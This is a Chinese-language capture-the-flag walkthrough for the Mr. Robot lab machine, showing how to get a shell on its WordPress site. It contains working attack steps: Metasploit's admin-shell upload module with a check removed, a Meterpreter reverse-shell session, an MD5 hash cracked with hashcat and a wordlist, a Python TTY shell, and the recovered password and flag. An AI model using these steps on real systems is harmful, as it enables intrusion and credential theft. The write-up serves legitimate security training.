--- tags: MrRobot, admin shell --- # 通过 WordPress 漏洞在目标主机上启动 shell 现在已经有了管理员凭据，并且成功登录，让我们继续看看是否可以植入一个 [admin shell](https://www.rapid7.com/db/modules/exploit/unix/webapp/wp_admin_shell_upload)。我们将为此使用 [Metasploit](https://www.metasploit.com/) 。 启动 [msfconsole](https://www.offensive-security.com/metasploit-unleashed/msfconsole/)： ```shell $ msfconsole Love leveraging credentials? Check out bruteforcing in Metasploit Pro -- learn more on http://rapid7.com/metasploit =[ metasploit v6.3.14-dev ] + -- --=[ 2311 exploits - 1206 auxiliary - 412 post ] + -- --=[ 975 payloads - 46 encoders - 11 nops ] + -- --=[ 9 evasion ] Metasploit tip: Start commands with a space to avoid saving them to history Metasploit Documentation: https://docs.metasploit.com/ ``` 选择 wp_admin_shell_upload 模块： ```shell msf > use exploit/unix/webapp/wp_admin_shell_upload msf exploit(wp_admin_shell_upload) > show options Module options (exploit/unix/webapp/wp_admin_shell_upload): Name Current Setting Required Description ---- --------------- -------- ----------- PASSWORD yes The WordPress password to authenticate with Proxies no A proxy chain of format type:host:port[,type:host:port][...] RHOST yes The target address RPORT 80 yes The target port SSL false no Negotiate SSL/TLS for outgoing connections TARGETURI / yes The base path to the wordpress application USERNAME yes The WordPress username to authenticate with VHOST no HTTP server virtual host Exploit target: Id Name -- ---- 0 WordPress ``` 配置 wp_admin_shell_upload 模块： ```shell msf exploit(wp_admin_shell_upload) > set USERNAME elliot USERNAME => elliot msf exploit(wp_admin_shell_upload) > set PASSWORD ER28-0652 PASSWORD => ER28-0652 msf exploit(wp_admin_shell_upload) > set RHOST 192.168.8.158 RHOST => 192.168.8.158 ``` 运行 exploit ： ```shell msf exploit(wp_admin_shell_upload) > exploit [*] Started reverse TCP handler on 192.168.8.115:4444 [-] Exploit aborted due to failure: not-found: The target does not appear to be using WordPress [*] Exploit completed, but no session was created. ``` Oh...似乎 exploit 正在运行，但该网站未被检测为 WordPress 网站。 查看 exploit 的[源代码](https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/webapp/wp_admin_shell_upload.rb)，可能是这一行报的错： ```ruby fail_with(Failure::NotFound, 'The target does not appear to be using WordPress') unless wordpress_and_online? ``` 注释掉这一行： ```shell root@kali:~# vim /usr/share/metasploit-framework/modules/exploits/unix/webapp/wp_admin_shell_upload.rb def exploit #fail_with(Failure::NotFound, 'The target does not appear to be using WordPress') unless wordpress_and_online? ``` 回到 msfconsole ，重新加载、配置 wp_admin_shell_upload 模块并运行 exploit ： ```shell msf exploit(wp_admin_shell_upload) > reload [*] Reloading module... msf exploit(wp_admin_shell_upload) > exploit [*] Started reverse TCP handler on 192.168.8.115:4444 [*] Authenticating with WordPress using elliot:ER28-0652... [+] Authenticated with WordPress [*] Preparing payload... [*] Uploading payload... [*] Executing the payload at /wp-content/plugins/wSfBgKFuzM/gJoAGUYUBw.php... [*] Sending stage (39927 bytes) to 192.168.8.158 [*] Meterpreter session 2 opened (192.168.8.115:4444 -> 192.168.8.158:42660) at 2023-05-05 12:05:35 -0400 [!] This exploit may require manual cleanup of 'gJoAGUYUBw.php' on the target [!] This exploit may require manual cleanup of 'wSfBgKFuzM.php' on the target [!] This exploit may require manual cleanup of '../wSfBgKFuzM' on the target meterpreter > ``` Awesome! exploit 成功了，在目标主机上成功启动了一个 [Meterpreter 会话](https://www.offensive-security.com/metasploit-unleashed/about-meterpreter/) ！ 接下来四处走走，看看能找到什么！ ```bash meterpreter > pwd /opt/bitnami/apps/wordpress/htdocs/wp-content/plugins/OTZuwKynuy meterpreter > cd / meterpreter > dir Listing: / ========== Mode Size Type Last modified Name ---- ---- ---- ------------- ---- 40755/rwxr-xr-x 4096 dir 2015-09-16 05:49:06 -0500 bin 40755/rwxr-xr-x 4096 dir 2015-11-13 02:52:43 -0600 boot 40755/rwxr-xr-x 3820 dir 2016-09-30 15:14:56 -0500 dev 40755/rwxr-xr-x 4096 dir 2016-09-30 15:14:56 -0500 etc 40755/rwxr-xr-x 4096 dir 2015-11-13 00:25:35 -0600 home 100644/rw-r--r-- 5582759 fil 2015-11-13 02:52:43 -0600 initrd.img 40755/rwxr-xr-x 4096 dir 2015-09-16 05:49:06 -0500 lib 40755/rwxr-xr-x 4096 dir 2015-09-16 05:49:06 -0500 lib64 40700/rwx------ 16384 dir 2015-06-24 05:44:49 -0500 lost+found 40755/rwxr-xr-x 4096 dir 2015-09-16 05:49:06 -0500 media 40755/rwxr-xr-x 4096 dir 2015-11-13 02:52:20 -0600 mnt 40755/rwxr-xr-x 4096 dir 2015-09-16 05:49:06 -0500 opt 40555/r-xr-xr-x 0 dir 2016-09-30 20:15:00 -0500 proc 40700/rwx------ 4096 dir 2015-11-13 17:50:07 -0600 root 40755/rwxr-xr-x 480 dir 2016-09-30 20:15:15 -0500 run 40755/rwxr-xr-x 4096 dir 2015-11-13 02:52:14 -0600 sbin 40755/rwxr-xr-x 4096 dir 2015-09-16 05:49:06 -0500 srv 40555/r-xr-xr-x 0 dir 2016-09-30 15:14:53 -0500 sys 41777/rwxrwxrwx 4096 dir 2016-09-30 23:26:01 -0500 tmp 40755/rwxr-xr-x 4096 dir 2015-09-16 05:49:06 -0500 usr 40755/rwxr-xr-x 4096 dir 2015-09-16 05:49:06 -0500 var 100600/rw------- 5821984 fil 2015-09-16 05:49:06 -0500 vmlinuz meterpreter > cd /home meterpreter > ls Listing: /home ============== Mode Size Type Last modified Name ---- ---- ---- ------------- ---- 40755/rwxr-xr-x 4096 dir 2015-11-13 01:20:08 -0600 robot ``` 有一个 robot 帐户！ 进入 robot 帐户的 Home 路径，看看有什么！ ```bash meterpreter > cd robot meterpreter > ls -la Listing: /home/robot ==================== Mode Size Type Last modified Name ---- ---- ---- ------------- ---- 100400/r-------- 33 fil 2015-11-13 01:28:21 -0600 key-2-of-3.txt 100644/rw-r--r-- 39 fil 2015-11-13 01:28:21 -0600 password.raw-md5 ``` 似乎发现了第二个 key 文件，但是没有访问权限！ ```bash meterpreter > cat key-2-of-3.txt [-] core_channel_open: Operation failed: 1 ``` password.raw-md5 文件，中一部分内容是 MD5 加密的： ```bash meterpreter > cat password.raw-md5 robot:c3fcd3d76192e4007dfb496cca67e13b ``` 拷贝到本地，用 [HashCat](https://hashcat.net/hashcat/) 或在线的 [HashKiller 服务](https://hashkiller.co.uk/md5-decrypter.aspx) 还是很容易破译的： ```bash $ ./hashcat64.bin -a 0 -m 0 password.md5 /usr/share/wordlists/rockyou.txt -o cracked.txt ``` 几秒钟后，我们得到： ```bash c3fcd3d76192e4007dfb496cca67e13b: abcdefghijklmnopqrstuvwxyz ``` OK, 我们现在有了 robot 帐户的密码，并且有了一个 Meterpreter 会话，试试看是否可以启动一个 shell 并以 robot 身份登陆： ```bash meterpreter > shell Process 2094 created. Channel 1 created. ``` Yes！我们得到了 shell ！ 现在我们希望能够以 robot 登录 shell，我们要做的就是通过 python 就是建立一个 [TTY Shell](http://unix.stackexchange.com/questions/4126/what-is-the-exact-difference-between-a-terminal-a-shell-a-tty-and-a-con) ： ```bash python -c 'import pty; pty.spawn("/bin/sh")' $ ``` > 更多信息请查看 [Spawning a TTY Shell](http://netsec.ws/?p=337) 然后就以 robot 身份登陆： ```bash $ su robot su robot Password: abcdefghijklmnopqrstuvwxyz robot@linux:~$ ``` 再尝试访问 key-2-of-3.txt： ```bash robot@linux:~$ ls -a ls -a . .. key-2-of-3.txt password.raw-md5 robot@linux:~$ cat key-2-of-3.txt cat key-2-of-3.txt 822c73956184f694993bede3eb39f959 ``` 很好！第二个 Key 到手！